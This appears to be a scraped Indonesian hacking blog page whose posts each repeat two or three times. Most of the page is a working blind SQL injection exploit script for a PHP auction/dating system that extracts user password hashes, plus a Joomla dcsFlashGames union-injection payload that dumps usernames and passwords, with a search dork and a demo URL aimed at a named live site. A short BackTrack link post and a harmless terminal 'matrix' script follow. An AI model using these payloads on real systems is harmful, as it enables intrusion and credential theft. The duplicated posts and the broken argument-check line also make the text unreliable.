Date & Sex Vor und Rückwärts Auktions System <= v2 Blind SQL Injection Exploit

+Name : Date & Sex Vor und Rückwärts Auktions System <= v2 Blind SQL Injection Exploit +Autor : Easy Laster +Date : 27.03.2010 +Script : Date & Sex Vor und Rückwärts Auktions System <= v2 +Download : ------------------ +Demo : http://phpspezial.de/date-auktion-v2/ +Price : 599.99€ +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/flirt/auktion_text.php?id_auk= #password +Exploitable : http://www.site.com/flirt/auktion_text.php?id_auk=1+and+1=1+and+ ascii(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1


-----------------------------------------------------------------------------------------

#Exploit

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, getopt

def out(str):
sys.stdout.write(str)
sys.stdout.flush()

def read_url(url):
while True:
try:
src = urllib2.urlopen(url).read()
break
except:
pass
return src

class Exploit:
charset = "0123456789abcdefABCDEF"
url = ""
charn = 1
id = 1
table_prefix = ""
table_field = ""
passwd = ""
columns = []
find_passwd = True

def __init__(self):
if len(sys.argv) <> *"
print "* *"
print "* Example: *"
print "* *"
print "* Get the password of the user with id 2: *"
print "* python exploit.py --id 2 http://site.de/path/ *"
print "* *"
print "* Get email, username and password of id 1: *"
print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/ *"
print "* *"
print "* Switches: *"
print "* --nopw Search no password *"
print "* *"
print "* Options: *"
print "* --id User id *"
print "* --prefix Table prefix of ECP *"
print "* --charn <1 default =" 1"> Start at position x *"
print "* --columns Get value of any column you want *"
print "*****************************************************************************"
exit()
opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"])
for opt in opts:
if opt[0] == "--id":
self.id = int(opt[1])
elif opt[0] == "--prefix":
self.table_prefix = opt[1]
elif opt[0] == "--charn":
self.charn = int(opt[1])
elif opt[0] == "--columns":
for col in opt[1].split(","):
max, charx, name = col.split(":")
self.columns.append([int(max), int(charx), name, ""])
elif opt[0] == "--nopw":
self.find_passwd = False
for switch in switches:
if switch[:4] == "http":
if switch[-1:] == "/":
self.url = switch
else:
self.url = switch + "/"
def generate_url(self, ascii):
return self.url + "auktion_text.php?id_auk=1+and+1=1+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "fh_user+WHERE+iduser=" + str(self.id) + "%20LIMIT%200,1)," + str(self.charn) + ",1))%3E" + str(ord(ascii))
def start(self):
print "Exploiting..."
if self.find_passwd:
charx = self.charn
self.password()
if len(self.columns) > 0:
self.read_columns()
print "All finished!\n"
print "------ Results ------"
if len(self.columns) > 0:
for v in self.columns:
print "Column \"" + v[2] + "\": " + v[3]
if self.find_passwd:
if len(self.passwd) == 32 - charx + 1:
print "Password: " + self.passwd
else:
print "Password not found!"
print "--------------------"
def read_columns(self):
end = False
charrange = [0]
charrange.extend(range(32, 256))
for i in range(len(self.columns)):
out("Getting value of \"" + self.columns[i][2] + "\": ")
self.table_field = self.columns[i][2]
self.charn = self.columns[i][1]
for pwc in range(self.charn, self.columns[i][0] + 1):
if end == True:
break
self.charn = pwc
end = False
for c in charrange:
src = read_url(self.generate_url(chr(c)))
if "test" not in src:
if c == 0:
end = True
else:
self.columns[i][3] += chr(c)
out(chr(c))
break
out("\n")
def password(self):
out("Getting password: ")
self.table_field = "password"
for pwc in range(self.charn, 33):
self.charn = pwc
for c in self.charset:
src = read_url(self.generate_url(c))
if "test" not in src:
self.passwd += c
out(c)
break
out("\n")

exploit = Exploit()
exploit.start()

Date & Sex Vor und Rückwärts Auktions System <= v2 Blind SQL Injection Exploit

+Name : Date & Sex Vor und Rückwärts Auktions System <= v2 Blind SQL Injection Exploit +Autor : Easy Laster +Date : 27.03.2010 +Script : Date & Sex Vor und Rückwärts Auktions System <= v2 +Download : ------------------ +Demo : http://phpspezial.de/date-auktion-v2/ +Price : 599.99€ +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/flirt/auktion_text.php?id_auk= #password +Exploitable : http://www.site.com/flirt/auktion_text.php?id_auk=1+and+1=1+and+ ascii(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1


-----------------------------------------------------------------------------------------

#Exploit

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, getopt

def out(str):
sys.stdout.write(str)
sys.stdout.flush()

def read_url(url):
while True:
try:
src = urllib2.urlopen(url).read()
break
except:
pass
return src

class Exploit:
charset = "0123456789abcdefABCDEF"
url = ""
charn = 1
id = 1
table_prefix = ""
table_field = ""
passwd = ""
columns = []
find_passwd = True

def __init__(self):
if len(sys.argv) <> *"
print "* *"
print "* Example: *"
print "* *"
print "* Get the password of the user with id 2: *"
print "* python exploit.py --id 2 http://site.de/path/ *"
print "* *"
print "* Get email, username and password of id 1: *"
print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/ *"
print "* *"
print "* Switches: *"
print "* --nopw Search no password *"
print "* *"
print "* Options: *"
print "* --id User id *"
print "* --prefix Table prefix of ECP *"
print "* --charn <1 default =" 1"> Start at position x *"
print "* --columns Get value of any column you want *"
print "*****************************************************************************"
exit()
opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"])
for opt in opts:
if opt[0] == "--id":
self.id = int(opt[1])
elif opt[0] == "--prefix":
self.table_prefix = opt[1]
elif opt[0] == "--charn":
self.charn = int(opt[1])
elif opt[0] == "--columns":
for col in opt[1].split(","):
max, charx, name = col.split(":")
self.columns.append([int(max), int(charx), name, ""])
elif opt[0] == "--nopw":
self.find_passwd = False
for switch in switches:
if switch[:4] == "http":
if switch[-1:] == "/":
self.url = switch
else:
self.url = switch + "/"
def generate_url(self, ascii):
return self.url + "auktion_text.php?id_auk=1+and+1=1+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "fh_user+WHERE+iduser=" + str(self.id) + "%20LIMIT%200,1)," + str(self.charn) + ",1))%3E" + str(ord(ascii))
def start(self):
print "Exploiting..."
if self.find_passwd:
charx = self.charn
self.password()
if len(self.columns) > 0:
self.read_columns()
print "All finished!\n"
print "------ Results ------"
if len(self.columns) > 0:
for v in self.columns:
print "Column \"" + v[2] + "\": " + v[3]
if self.find_passwd:
if len(self.passwd) == 32 - charx + 1:
print "Password: " + self.passwd
else:
print "Password not found!"
print "--------------------"
def read_columns(self):
end = False
charrange = [0]
charrange.extend(range(32, 256))
for i in range(len(self.columns)):
out("Getting value of \"" + self.columns[i][2] + "\": ")
self.table_field = self.columns[i][2]
self.charn = self.columns[i][1]
for pwc in range(self.charn, self.columns[i][0] + 1):
if end == True:
break
self.charn = pwc
end = False
for c in charrange:
src = read_url(self.generate_url(chr(c)))
if "test" not in src:
if c == 0:
end = True
else:
self.columns[i][3] += chr(c)
out(chr(c))
break
out("\n")
def password(self):
out("Getting password: ")
self.table_field = "password"
for pwc in range(self.charn, 33):
self.charn = pwc
for c in self.charset:
src = read_url(self.generate_url(c))
if "test" not in src:
self.passwd += c
out(c)
break
out("\n")

exploit = Exploit()
exploit.start()

Date & Sex Vor und Rückwärts Auktions System <= v2 Blind SQL Injection Exploit

+Name : Date & Sex Vor und Rückwärts Auktions System <= v2 Blind SQL Injection Exploit +Autor : Easy Laster +Date : 27.03.2010 +Script : Date & Sex Vor und Rückwärts Auktions System <= v2 +Download : ------------------ +Demo : http://phpspezial.de/date-auktion-v2/ +Price : 599.99€ +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/flirt/auktion_text.php?id_auk= #password +Exploitable : http://www.site.com/flirt/auktion_text.php?id_auk=1+and+1=1+and+ ascii(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1


-----------------------------------------------------------------------------------------

#Exploit

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, getopt

def out(str):
sys.stdout.write(str)
sys.stdout.flush()

def read_url(url):
while True:
try:
src = urllib2.urlopen(url).read()
break
except:
pass
return src

class Exploit:
charset = "0123456789abcdefABCDEF"
url = ""
charn = 1
id = 1
table_prefix = ""
table_field = ""
passwd = ""
columns = []
find_passwd = True

def __init__(self):
if len(sys.argv) <> *"
print "* *"
print "* Example: *"
print "* *"
print "* Get the password of the user with id 2: *"
print "* python exploit.py --id 2 http://site.de/path/ *"
print "* *"
print "* Get email, username and password of id 1: *"
print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/ *"
print "* *"
print "* Switches: *"
print "* --nopw Search no password *"
print "* *"
print "* Options: *"
print "* --id User id *"
print "* --prefix Table prefix of ECP *"
print "* --charn <1 default =" 1"> Start at position x *"
print "* --columns Get value of any column you want *"
print "*****************************************************************************"
exit()
opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"])
for opt in opts:
if opt[0] == "--id":
self.id = int(opt[1])
elif opt[0] == "--prefix":
self.table_prefix = opt[1]
elif opt[0] == "--charn":
self.charn = int(opt[1])
elif opt[0] == "--columns":
for col in opt[1].split(","):
max, charx, name = col.split(":")
self.columns.append([int(max), int(charx), name, ""])
elif opt[0] == "--nopw":
self.find_passwd = False
for switch in switches:
if switch[:4] == "http":
if switch[-1:] == "/":
self.url = switch
else:
self.url = switch + "/"
def generate_url(self, ascii):
return self.url + "auktion_text.php?id_auk=1+and+1=1+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "fh_user+WHERE+iduser=" + str(self.id) + "%20LIMIT%200,1)," + str(self.charn) + ",1))%3E" + str(ord(ascii))
def start(self):
print "Exploiting..."
if self.find_passwd:
charx = self.charn
self.password()
if len(self.columns) > 0:
self.read_columns()
print "All finished!\n"
print "------ Results ------"
if len(self.columns) > 0:
for v in self.columns:
print "Column \"" + v[2] + "\": " + v[3]
if self.find_passwd:
if len(self.passwd) == 32 - charx + 1:
print "Password: " + self.passwd
else:
print "Password not found!"
print "--------------------"
def read_columns(self):
end = False
charrange = [0]
charrange.extend(range(32, 256))
for i in range(len(self.columns)):
out("Getting value of \"" + self.columns[i][2] + "\": ")
self.table_field = self.columns[i][2]
self.charn = self.columns[i][1]
for pwc in range(self.charn, self.columns[i][0] + 1):
if end == True:
break
self.charn = pwc
end = False
for c in charrange:
src = read_url(self.generate_url(chr(c)))
if "test" not in src:
if c == 0:
end = True
else:
self.columns[i][3] += chr(c)
out(chr(c))
break
out("\n")
def password(self):
out("Getting password: ")
self.table_field = "password"
for pwc in range(self.charn, 33):
self.charn = pwc
for c in self.charset:
src = read_url(self.generate_url(c))
if "test" not in src:
self.passwd += c
out(c)
break
out("\n")

exploit = Exploit()
exploit.start()

Install Tools backtract di ubuntu 9.10

langsung aja
menuju site berikutnya
http://undercrew.mc-crew.org/?p=98

creensotnya

Install Tools backtract di ubuntu 9.10

langsung aja
menuju site berikutnya
http://undercrew.mc-crew.org/?p=98

creensotnya

Install Tools backtract di ubuntu 9.10

langsung aja
menuju site berikutnya
http://undercrew.mc-crew.org/?p=98

creensotnya

Joomla Component dcsFlashGames SQL Vulnerability ( catid )

[!]===========================================================================[!]

[~] Joomla Component dcsFlashGames SQL Vulnerability ( catid )
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 25 March, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://ekith.com/
[+] Description : http://ext.joom.ru/dcsflashgames.html
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/project/sageth/frs/
[+] Version : 2.0RC1

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&catid=[INDONESIANCODER]



[ XpL ]

666+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--




[ d3m0 ]

http://www.pokermachinez.com/index.php?option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--




etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31


[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] Ayy : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

Joomla Component dcsFlashGames SQL Vulnerability ( catid )

[!]===========================================================================[!]

[~] Joomla Component dcsFlashGames SQL Vulnerability ( catid )
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 25 March, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://ekith.com/
[+] Description : http://ext.joom.ru/dcsflashgames.html
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/project/sageth/frs/
[+] Version : 2.0RC1

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&catid=[INDONESIANCODER]



[ XpL ]

666+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--




[ d3m0 ]

http://www.pokermachinez.com/index.php?option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--




etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31


[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] Ayy : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

Joomla Component dcsFlashGames SQL Vulnerability ( catid )

[!]===========================================================================[!]

[~] Joomla Component dcsFlashGames SQL Vulnerability ( catid )
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 25 March, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://ekith.com/
[+] Description : http://ext.joom.ru/dcsflashgames.html
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/project/sageth/frs/
[+] Version : 2.0RC1

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&catid=[INDONESIANCODER]



[ XpL ]

666+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--




[ d3m0 ]

http://www.pokermachinez.com/index.php?option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--




etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31


[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] Ayy : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

Python......Matrix Result

habis jalan2 di google sama tuan muda yur4kh4
dapet matrix python...
bentuknya siiip buat screenserver ini
hahahahahhaha
ini scrinnya


coder
#!/usr/bin/python
# -*- coding: utf-8 -*-
# gunslinger_ 08 feb 2010
# this code is protected under the gpl
# get your copy at

import os, time, random, sys

class message(str):
def __new__(cls, text, speed):
self = super(message, cls).__new__(cls, text)
self.speed = speed
self.y = -1*len(text)
self.x = random.randint(0, display().width)
self.skip = 0
return self

def move(self):
if self.speed > self.skip:
self.skip += 1
else:
self.skip = 0
self.y += 1

class display(list):
def __init__(self):
self.height, self.width = [int(x) for x in os.popen('stty size', 'r').read().split()]
self[:] = [' ' for y in xrange(self.height) for x in xrange(self.width)]

def set_vertical(self, x, y, string):
string = string[::-1]
if x < 0:
x = 80 + x
if x >= self.width:
x = self.width-1
if y < 0:
string = string[abs(y):]
y = 0
if y + len(string) > self.height:
string = string[0:self.height - y]
if y >= self.height:
return
start = y*self.width+x
length = self.width*(y+len(string))
step = self.width

self[start:length:step] = string

def __str__(self):
return ''.join(self)

i_message = raw_input("Input a message: ")
messages = [message(i_message, random.randint(1, 5))]
for t in xrange(1000000):
messages.append(message(i_message[::-1], random.randint(1, 5)))
d = display()
for text in messages:
d.set_vertical(text.x, text.y, text)
text.move()
sys.stdout.write(str(d))
sys.stdout.flush()
del d
time.sleep(0.1)